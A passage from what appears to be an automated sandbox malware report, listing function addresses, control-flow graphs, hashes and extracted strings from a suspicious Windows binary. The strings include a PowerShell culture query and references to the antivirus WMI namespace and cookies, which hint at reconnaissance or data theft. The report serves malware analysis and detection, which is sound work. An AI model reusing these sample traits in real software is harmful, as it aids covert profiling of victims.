                                                                                          0x7ff768ba23ed
                                                                                          0x7ff768ba23f7
                                                                                          0x7ff768ba2405
                                                                                          0x7ff768ba2413
                                                                                          0x7ff768ba241a
                                                                                          0x7ff768ba2429
                                                                                          0x7ff768ba2432
                                                                                          0x7ff768ba2436
                                                                                          0x7ff768ba243d
                                                                                          0x7ff768ba2441
                                                                                          0x7ff768ba2450
                                                                                          0x7ff768ba2471
                                                                                          0x7ff768ba2474
                                                                                          0x7ff768ba247c
                                                                                          0x7ff768ba248a
                                                                                          0x7ff768ba2497
                                                                                          0x7ff768ba24a3
                                                                                          0x7ff768ba24c5
                                                                                          0x7ff768ba24cc
                                                                                          0x7ff768ba24d0
                                                                                          0x7ff768ba24e1
                                                                                          0x7ff768ba24e8
                                                                                          0x7ff768ba24f3
                                                                                          0x7ff768ba24f9
                                                                                          0x7ff768ba2508
                                                                                          0x7ff768ba251a
                                                                                          0x7ff768ba2520
                                                                                          0x7ff768ba2527
                                                                                          0x7ff768ba252e
                                                                                          0x7ff768ba2540
                                                                                          0x7ff768ba2540
                                                                                          0x7ff768ba2544
                                                                                          0x7ff768ba2554
                                                                                          0x7ff768ba255a

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Free$Heap$String
                                                                                          • String ID: NL$$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$displayN$failed to write whole buffer$nown$playName$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$root\SecurityCenter2$C
                                                                                          • API String ID: 2419388322-108085218
                                                                                          • Opcode ID: 500124da8c60f3826c4eee9c20ed61ea2eb0c4992c4b8345b309aac87b4c5b29
                                                                                          • Instruction ID: 1e706f9fab55c48705705239fb4829539bacf9ce659709a4c645918862bb3dbf
                                                                                          • Opcode Fuzzy Hash: 500124da8c60f3826c4eee9c20ed61ea2eb0c4992c4b8345b309aac87b4c5b29
                                                                                          • Instruction Fuzzy Hash: 2A238962604B82C5EB20EF25E8543E9F7A5FF48B88F848136DA4D0BB95DF38D255C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8ED6 Relevance: 25.9, APIs: 16, Strings: 1, Instructions: 352memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CloseHandlememcpy
                                                                                          • String ID: %0A
                                                                                          • API String ID: 2532389815-525998828
                                                                                          • Opcode ID: 56aee5d956b5a2ec56d9af42349786c7986c7951895d5eddc5ceab87cb5cdebc
                                                                                          • Instruction ID: cc537cdd9ac3c31729aff608ca490e517e38342af615b0a28fe7fd32cc939d77
                                                                                          • Opcode Fuzzy Hash: 56aee5d956b5a2ec56d9af42349786c7986c7951895d5eddc5ceab87cb5cdebc
                                                                                          • Instruction Fuzzy Hash: 54125171A04AC2C9EB31AF25D8583E9A365FF48B88F844136DA0D4BF99DF38D645C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8FD5 Relevance: 25.9, APIs: 16, Strings: 1, Instructions: 351memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CloseHandlememcpy
                                                                                          • String ID: %0A
                                                                                          • API String ID: 2532389815-525998828
                                                                                          • Opcode ID: 45c4c9a79768c7af1808ef535edc19de571e5d9995d598afe1be459c91dd06d8
                                                                                          • Instruction ID: 95ea944b011cafb6550bcca7caa10fafd1722477d7541bedef3d1d7617e59e4d
                                                                                          • Opcode Fuzzy Hash: 45c4c9a79768c7af1808ef535edc19de571e5d9995d598afe1be459c91dd06d8
                                                                                          • Instruction Fuzzy Hash: F4024071A04AC2C9EB31EF25D8583E9A365FF48B88F844136DA0D4BB99DF38D645C358
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C363F0 Relevance: 25.1, APIs: 13, Strings: 3, Instructions: 1051COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: Pending error polled more than once$cookie2$failed to write whole buffer
                                                                                          • API String ID: 3510742995-504009967
                                                                                          • Opcode ID: 25df197dce859f4b1e488d84f55c4cf1d578c4495d5a5aff32fc708ee50f707f
                                                                                          • Instruction ID: 4fd50e7587012db47be93a064b572532baec40ffff65cd103956a141c7253592
                                                                                          • Opcode Fuzzy Hash: 25df197dce859f4b1e488d84f55c4cf1d578c4495d5a5aff32fc708ee50f707f
                                                                                          • Instruction Fuzzy Hash: 2EC29B62A09BC5C6EA219B15E4447EAF3A4FF88784F815136DB8C43795EF3CE186CB14
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA2917 Relevance: 24.1, APIs: 11, Strings: 4, Instructions: 1553memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 12879 7ff768ba2917-7ff768ba2921 12879->12879 12880 7ff768ba2923-7ff768ba292a 12879->12880 12881 7ff768ba2931-7ff768ba294c HeapFree 12880->12881 12881->12881 12882 7ff768ba294e-7ff768ba2955 12881->12882 12883 7ff768ba2977-7ff768ba2982 12882->12883 12884 7ff768ba2957-7ff768ba295f 12882->12884 12886 7ff768ba2988-7ff768ba2991 12883->12886 12887 7ff768ba4739-7ff768ba4740 CloseHandle 12883->12887 12884->12883 12885 7ff768ba2961-7ff768ba2971 HeapFree 12884->12885 12885->12883 12886->12887 12888 7ff768ba2997-7ff768ba29a2 12886->12888 12889 7ff768ba474b-7ff768ba4752 CloseHandle 12887->12889 12888->12889 12890 7ff768ba29a8-7ff768ba29b1 12888->12890 12892 7ff768ba475d-7ff768ba4764 CloseHandle 12889->12892 12890->12889 12891 7ff768ba29b7-7ff768ba29c2 12890->12891 12891->12892 12893 7ff768ba29c8-7ff768ba29d1 12891->12893 12895 7ff768ba4788-7ff768ba4acf call 7ff768b73746 call 7ff768b7996a call 7ff768b77b87 * 2 call 7ff768bb17c0 memcpy * 2 call 7ff768b902f0 call 7ff768b79a00 call 7ff768bb17c0 * 2 call 7ff768bdd324 call 7ff768b7c40e call 7ff768befd87 call 7ff768b7d9f9 12892->12895 12893->12892 12894 7ff768ba29d7-7ff768ba29df 12893->12894 12896 7ff768ba29e1-7ff768ba29f1 HeapFree 12894->12896 12897 7ff768ba29f7-7ff768ba2a0b call 7ff768b77c7a 12894->12897 12977 7ff768ba4ad6-7ff768ba4af0 12895->12977 12896->12897 12903 7ff768ba2a23-7ff768ba2a2b 12897->12903 12904 7ff768ba2a0d-7ff768ba2a1d HeapFree 12897->12904 12905 7ff768ba2a43-7ff768ba2a57 call 7ff768b77c7a 12903->12905 12906 7ff768ba2a2d-7ff768ba2a3d HeapFree 12903->12906 12904->12903 12912 7ff768ba2a6f-7ff768ba2a77 12905->12912 12913 7ff768ba2a59-7ff768ba2a69 HeapFree 12905->12913 12906->12905 12916 7ff768ba2a8f-7ff768ba2ac4 call 7ff768b77c7a 12912->12916 12917 7ff768ba2a79-7ff768ba2a89 HeapFree 12912->12917 12913->12912 12926 7ff768ba2aca-7ff768ba2b0b memcpy call 7ff768bf44d3 12916->12926 12927 7ff768bab2a8-7ff768babf10 call 7ff768dbc97c call 7ff768dba540 call 7ff768dba1e0 call 7ff768bb0250 12916->12927 12917->12916 12934 7ff768ba2b1f-7ff768ba2b67 call 7ff768b7cff3 12926->12934 12935 7ff768ba2b0d-7ff768ba2b19 HeapFree 12926->12935 12943 7ff768ba2b6e-7ff768ba2c13 12934->12943 12935->12934 12943->12943 12945 7ff768ba2c19-7ff768ba2c42 call 7ff768befd87 12943->12945 12955 7ff768ba2c54-7ff768ba2dde call 7ff768bb17c0 call 7ff768bdd324 call 7ff768b7cf3b call 7ff768befd87 call 7ff768b7c2aa call 7ff768b7c785 call 7ff768b8154c call 7ff768b75164 12945->12955 12956 7ff768ba2c44-7ff768ba2c50 call 7ff768c51b93 12945->12956 13001 7ff768ba2de0-7ff768ba2de4 call 7ff768b7921d 12955->13001 13002 7ff768ba2de9-7ff768ba2e80 call 7ff768b7e3b9 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 12955->13002 12956->12955 12977->12977 12980 7ff768ba4af2-7ff768ba4c55 call 7ff768befd87 call 7ff768b74e32 call 7ff768b7e06c call 7ff768befd87 call 7ff768b7ccad 12977->12980 13007 7ff768ba4c5c-7ff768ba4c76 12980->13007 13001->13002 13019 7ff768ba2e82-7ff768ba2e86 call 7ff768b7921d 13002->13019 13020 7ff768ba2e8b-7ff768ba2f25 call 7ff768b7c5fd call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13002->13020 13007->13007 13009 7ff768ba4c78-7ff768ba4cf9 call 7ff768befd87 call 7ff768b74e32 13007->13009 13009->12927 13019->13020 13030 7ff768ba2f30-7ff768ba2fc9 call 7ff768b7d8fb call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13020->13030 13031 7ff768ba2f27-7ff768ba2f2b call 7ff768b7921d 13020->13031 13041 7ff768ba2fd4-7ff768ba3075 call 7ff768b7c1df call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13030->13041 13042 7ff768ba2fcb-7ff768ba2fcf call 7ff768b7921d 13030->13042 13031->13030 13052 7ff768ba3080-7ff768ba3131 call 7ff768b7c63d call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13041->13052 13053 7ff768ba3077-7ff768ba307b call 7ff768b7921d 13041->13053 13042->13041 13063 7ff768ba3133-7ff768ba3137 call 7ff768b7921d 13052->13063 13064 7ff768ba313c-7ff768ba31dd call 7ff768b7dc47 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13052->13064 13053->13052 13063->13064 13074 7ff768ba31df-7ff768ba31e3 call 7ff768b7921d 13064->13074 13075 7ff768ba31e8-7ff768ba3298 call 7ff768b7e350 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13064->13075 13074->13075 13085 7ff768ba32a3-7ff768ba334a call 7ff768b7dfbc call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13075->13085 13086 7ff768ba329a-7ff768ba329e call 7ff768b7921d 13075->13086 13096 7ff768ba3355-7ff768ba33f3 call 7ff768b7db94 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13085->13096 13097 7ff768ba334c-7ff768ba3350 call 7ff768b7921d 13085->13097 13086->13085 13107 7ff768ba33f5-7ff768ba33f9 call 7ff768b7921d 13096->13107 13108 7ff768ba33fe-7ff768ba343f call 7ff768b7de6f 13096->13108 13097->13096 13107->13108 13112 7ff768ba3446-7ff768ba34eb 13108->13112 13112->13112 13113 7ff768ba34f1-7ff768ba355f call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13112->13113 13120 7ff768ba3561-7ff768ba3565 call 7ff768b7921d 13113->13120 13121 7ff768ba356a-7ff768ba35ab call 7ff768b7c73b 13113->13121 13120->13121 13125 7ff768ba35b2-7ff768ba3657 13121->13125 13125->13125 13126 7ff768ba365d-7ff768ba36e4 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13125->13126 13133 7ff768ba36ef-7ff768ba3792 call 7ff768b7c6eb call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13126->13133 13134 7ff768ba36e6-7ff768ba36ea call 7ff768b7921d 13126->13134 13144 7ff768ba3794-7ff768ba3798 call 7ff768b7921d 13133->13144 13145 7ff768ba379d-7ff768ba383b call 7ff768b7cc8b call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13133->13145 13134->13133 13144->13145 13155 7ff768ba3846-7ff768ba3906 call 7ff768b7d284 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13145->13155 13156 7ff768ba383d-7ff768ba3841 call 7ff768b7921d 13145->13156 13166 7ff768ba3911-7ff768ba39cb call 7ff768b7c20f call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13155->13166 13167 7ff768ba3908-7ff768ba390c call 7ff768b7921d 13155->13167 13156->13155 13177 7ff768ba39d6-7ff768ba3a71 call 7ff768b7cacc call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13166->13177 13178 7ff768ba39cd-7ff768ba39d1 call 7ff768b7921d 13166->13178 13167->13166 13188 7ff768ba3a73-7ff768ba3a77 call 7ff768b7921d 13177->13188 13189 7ff768ba3a7c-7ff768ba3b1f call 7ff768b7c591 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13177->13189 13178->13177 13188->13189 13199 7ff768ba3b21-7ff768ba3b25 call 7ff768b7921d 13189->13199 13200 7ff768ba3b2a-7ff768ba3bea call 7ff768b7db57 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13189->13200 13199->13200 13210 7ff768ba3bf5-7ff768ba3cab call 7ff768b7e5de call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13200->13210 13211 7ff768ba3bec-7ff768ba3bf0 call 7ff768b7921d 13200->13211 13221 7ff768ba3cb6-7ff768ba3d57 call 7ff768b7c7c5 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13210->13221 13222 7ff768ba3cad-7ff768ba3cb1 call 7ff768b7921d 13210->13222 13211->13210 13232 7ff768ba3d62-7ff768ba3dfe call 7ff768b7c25f call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13221->13232 13233 7ff768ba3d59-7ff768ba3d5d call 7ff768b7921d 13221->13233 13222->13221 13243 7ff768ba3e00-7ff768ba3e04 call 7ff768b7921d 13232->13243 13244 7ff768ba3e09-7ff768ba3eb1 call 7ff768b7e40b call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13232->13244 13233->13232 13243->13244 13254 7ff768ba3eb3-7ff768ba3eb7 call 7ff768b7921d 13244->13254 13255 7ff768ba3ebc-7ff768ba3f7b call 7ff768b7c394 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13244->13255 13254->13255 13265 7ff768ba3f86-7ff768ba4040 call 7ff768b7e4c5 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13255->13265 13266 7ff768ba3f7d-7ff768ba3f81 call 7ff768b7921d 13255->13266 13276 7ff768ba4042-7ff768ba4046 call 7ff768b7921d 13265->13276 13277 7ff768ba404b-7ff768ba40f5 call 7ff768b7d056 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13265->13277 13266->13265 13276->13277 13287 7ff768ba4100-7ff768ba41b0 call 7ff768b7ca2b call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13277->13287 13288 7ff768ba40f7-7ff768ba40fb call 7ff768b7921d 13277->13288 13298 7ff768ba41b2-7ff768ba41b6 call 7ff768b7921d 13287->13298 13299 7ff768ba41bb-7ff768ba425f call 7ff768b7d190 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13287->13299 13288->13287 13298->13299 13309 7ff768ba4261-7ff768ba4265 call 7ff768b7921d 13299->13309 13310 7ff768ba426a-7ff768ba4304 call 7ff768b7e03c call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13299->13310 13309->13310 13320 7ff768ba430f-7ff768ba43a6 call 7ff768b7d493 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13310->13320 13321 7ff768ba4306-7ff768ba430a call 7ff768b7921d 13310->13321 13331 7ff768ba43b1-7ff768ba445b call 7ff768b7de40 call 7ff768befd87 call 7ff768b8154c call 7ff768b75164 13320->13331 13332 7ff768ba43a8-7ff768ba43ac call 7ff768b7921d 13320->13332 13321->13320 13342 7ff768ba4466-7ff768ba447e 13331->13342 13343 7ff768ba445d-7ff768ba4461 call 7ff768b7921d 13331->13343 13332->13331 13345 7ff768ba4484-7ff768ba4517 call 7ff768bdd1be memcpy 13342->13345 13346 7ff768ba458a-7ff768ba4737 call 7ff768b8121b 13342->13346 13343->13342 13351 7ff768ba451e-7ff768ba456a call 7ff768b8121b call 7ff768bb17c0 call 7ff768b9a8a8 memcpy 13345->13351 13346->12895
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcpy$BoundaryDeleteDescriptormemcmp
                                                                                          • String ID: NL$$failed to write whole buffer$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$C
                                                                                          • API String ID: 2287894582-1107536172
                                                                                          • Opcode ID: f766bb4f893750460cc6d61bfbf53110dd5a5f40df0d1f453e45535e822958fb
                                                                                          • Instruction ID: 9c7c041b2ce8a914d77508d2939bda08c682e65d638a0e6aa6a0e6eaade1f078
                                                                                          • Opcode Fuzzy Hash: f766bb4f893750460cc6d61bfbf53110dd5a5f40df0d1f453e45535e822958fb
                                                                                          • Instruction Fuzzy Hash: 7DF28A62604B82C5EB20EF25E8543E9F7A4FF48B88F858036DA4D4BB95DF38D215C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C47A98 Relevance: 23.5, APIs: 12, Strings: 3, Instructions: 960COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 13360 7ff768c47a98-7ff768c47ae6 13361 7ff768c47ae8-7ff768c47afa 13360->13361 13362 7ff768c47aff-7ff768c47bed 13360->13362 13365 7ff768c47d82-7ff768c47d8d 13361->13365 13363 7ff768c47cd2-7ff768c47d48 call 7ff768c3964d call 7ff768bfd2fc 13362->13363 13364 7ff768c47bf3-7ff768c47bf8 13362->13364 13387 7ff768c47d4a-7ff768c47d52 call 7ff768bfb821 13363->13387 13388 7ff768c47d57-7ff768c47d69 call 7ff768bfb91a 13363->13388 13366 7ff768c47bfa-7ff768c47c04 13364->13366 13367 7ff768c47c0b 13364->13367 13368 7ff768c47dd9-7ff768c47e17 13365->13368 13369 7ff768c47d8f-7ff768c47dd2 13365->13369 13371 7ff768c47c0d-7ff768c47c11 13366->13371 13372 7ff768c47c06 13366->13372 13367->13371 13373 7ff768c47c8b-7ff768c47cac call 7ff768dba650 13367->13373 13369->13368 13376 7ff768c47c2b-7ff768c47c30 13371->13376 13377 7ff768c47c13-7ff768c47c29 memcmp 13371->13377 13372->13373 13384 7ff768c47cae 13373->13384 13381 7ff768c47c32-7ff768c47c3c 13376->13381 13382 7ff768c47c40 13376->13382 13377->13376 13380 7ff768c47c64-7ff768c47c72 13377->13380 13389 7ff768c47e18-7ff768c47e6e 13380->13389 13390 7ff768c47c78-7ff768c47c7d 13380->13390 13385 7ff768c47c3e 13381->13385 13386 7ff768c47c42-7ff768c47c46 13381->13386 13382->13373 13382->13386 13384->13373 13391 7ff768c47cb0-7ff768c47cb4 13384->13391 13385->13373 13386->13363 13393 7ff768c47c4c-7ff768c47c62 memcmp 13386->13393 13387->13388 13388->13365 13401 7ff768c47d6b-7ff768c47d6e 13388->13401 13392 7ff768c47e76-7ff768c47e86 call 7ff768bde40a 13389->13392 13390->13384 13396 7ff768c47c7f-7ff768c47c89 13390->13396 13391->13363 13397 7ff768c47cb6-7ff768c47ccc memcmp 13391->13397 13403 7ff768c47e8c-7ff768c47efd call 7ff768bcf8b6 call 7ff768bcf629 13392->13403 13404 7ff768c480b2-7ff768c480d2 call 7ff768c38460 13392->13404 13393->13363 13393->13380 13396->13373 13396->13391 13397->13363 13397->13389 13401->13365 13402 7ff768c47d70-7ff768c47d7c HeapFree 13401->13402 13402->13365 13419 7ff768c47eff 13403->13419 13409 7ff768c4814c-7ff768c4817b 13404->13409 13410 7ff768c480d4-7ff768c48101 13404->13410 13414 7ff768c481da-7ff768c48213 13409->13414 13412 7ff768c4817d-7ff768c48181 13410->13412 13413 7ff768c48103-7ff768c4814a 13410->13413 13418 7ff768c48189-7ff768c481d5 13412->13418 13413->13418 13416 7ff768c486d7-7ff768c48723 13414->13416 13417 7ff768c48219-7ff768c48221 13414->13417 13420 7ff768c48729-7ff768c48909 call 7ff768bd0f31 memcpy call 7ff768c38519 13416->13420 13421 7ff768c48db4 13416->13421 13417->13416 13422 7ff768c48227-7ff768c4823d call 7ff768be271e 13417->13422 13418->13414 13424 7ff768c47f02-7ff768c47f0d 13419->13424 13449 7ff768c4890b-7ff768c48963 memcpy 13420->13449 13450 7ff768c48967-7ff768c48a04 memcpy 13420->13450 13428 7ff768c48dd9-7ff768c48e12 call 7ff768befd87 memcpy call 7ff768bb4b21 13421->13428 13429 7ff768c48db6-7ff768c48dcc 13421->13429 13422->13416 13437 7ff768c48243-7ff768c48273 call 7ff768bd0342 13422->13437 13424->13424 13425 7ff768c47f0f-7ff768c47f1b 13424->13425 13430 7ff768c47fb8-7ff768c47fd6 13425->13430 13431 7ff768c47f21-7ff768c47f38 13425->13431 13468 7ff768c48e1a-7ff768c48e7d call 7ff768c04292 13428->13468 13429->13428 13439 7ff768c47fd8-7ff768c47ffe 13430->13439 13440 7ff768c48000-7ff768c4800a 13430->13440 13431->13430 13435 7ff768c47f3a-7ff768c47f3e 13431->13435 13442 7ff768c47fad-7ff768c47fb3 13435->13442 13443 7ff768c47f40-7ff768c47f43 13435->13443 13437->13416 13456 7ff768c48279-7ff768c4828c 13437->13456 13441 7ff768c4800c-7ff768c480ad call 7ff768be5857 13439->13441 13440->13441 13441->13392 13442->13419 13447 7ff768c47f49-7ff768c47f67 13443->13447 13448 7ff768c4847f-7ff768c484a5 call 7ff768dba140 call 7ff768c04292 13443->13448 13447->13442 13455 7ff768c47f69-7ff768c47f71 13447->13455 13486 7ff768c484ab-7ff768c484af 13448->13486 13487 7ff768c48584-7ff768c48588 13448->13487 13449->13450 13457 7ff768c48ecb-7ff768c48f11 call 7ff768bfb821 call 7ff768dba540 13450->13457 13458 7ff768c48a0a-7ff768c48ace memcpy 13450->13458 13461 7ff768c47fa2-7ff768c47fa7 13455->13461 13462 7ff768c47f73-7ff768c47f7b 13455->13462 13456->13416 13464 7ff768c48292-7ff768c482c5 13456->13464 13492 7ff768c48f13-7ff768c48f15 13457->13492 13465 7ff768c48ad4-7ff768c48ad7 13458->13465 13466 7ff768c48ad0 13458->13466 13461->13392 13461->13442 13462->13442 13470 7ff768c47f7d-7ff768c47f9b memcmp 13462->13470 13464->13448 13472 7ff768c48ad9-7ff768c48ae7 13465->13472 13473 7ff768c48b0a-7ff768c48b0d 13465->13473 13466->13465 13497 7ff768c485dd-7ff768c48649 call 7ff768be62c3 13468->13497 13470->13442 13477 7ff768c47f9d 13470->13477 13479 7ff768c48aed-7ff768c48b08 call 7ff768c8744a 13472->13479 13480 7ff768c48ae9 13472->13480 13476 7ff768c48b3d-7ff768c48b99 call 7ff768bde207 memcpy 13473->13476 13499 7ff768c48b9b-7ff768c48bae call 7ff768bde159 13476->13499 13500 7ff768c48bb2-7ff768c48c5d call 7ff768c38750 call 7ff768c38971 call 7ff768bfb91a memcpy call 7ff768c38ac9 13476->13500 13477->13392 13479->13473 13495 7ff768c48b0f-7ff768c48b21 call 7ff768bad0e0 13479->13495 13480->13479 13488 7ff768c48668-7ff768c4868a call 7ff768c275c5 13486->13488 13489 7ff768c484b5-7ff768c484b9 13486->13489 13487->13416 13493 7ff768c4858e-7ff768c485d3 13487->13493 13488->13416 13514 7ff768c4868c-7ff768c486ab 13488->13514 13489->13416 13496 7ff768c484bf-7ff768c484c8 13489->13496 13501 7ff768c48f17-7ff768c48f29 call 7ff768db9d40 13492->13501 13510 7ff768c485d6 13493->13510 13495->13501 13518 7ff768c48b27-7ff768c48b3a 13495->13518 13496->13416 13503 7ff768c484ce-7ff768c48512 call 7ff768c27aa3 13496->13503 13497->13416 13520 7ff768c4864f-7ff768c48666 13497->13520 13499->13500 13536 7ff768c48c62-7ff768c48c79 13500->13536 13523 7ff768c48516-7ff768c48524 13503->13523 13510->13497 13514->13468 13521 7ff768c486b1-7ff768c486be call 7ff768c04292 13514->13521 13518->13476 13520->13416 13521->13416 13527 7ff768c48528-7ff768c4852b 13523->13527 13531 7ff768c4852d-7ff768c4854e 13527->13531 13532 7ff768c48564-7ff768c4856e 13527->13532 13531->13527 13534 7ff768c48550-7ff768c4855d 13531->13534 13532->13416 13535 7ff768c48574-7ff768c48582 13532->13535 13534->13527 13537 7ff768c4855f-7ff768c486cb 13534->13537 13535->13523 13536->13492 13538 7ff768c48c7f-7ff768c48daf 13536->13538 13537->13416 13540 7ff768c486cd-7ff768c486d1 13537->13540 13538->13365 13540->13416 13541 7ff768c48e82-7ff768c48ec6 13540->13541 13541->13510
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcmp
                                                                                          • String ID: failed to write whole buffer$http$valid request parts
                                                                                          • API String ID: 1475443563-422915152
                                                                                          • Opcode ID: a06d2ed8958997c0374ae3a399d304245e59f52859bf28516b7e7d3e144fa574
                                                                                          • Instruction ID: decfb11bda2a2a654ed7b473ba799b5dff35e9ee7e70fa09d53c72f30ca9f0c9
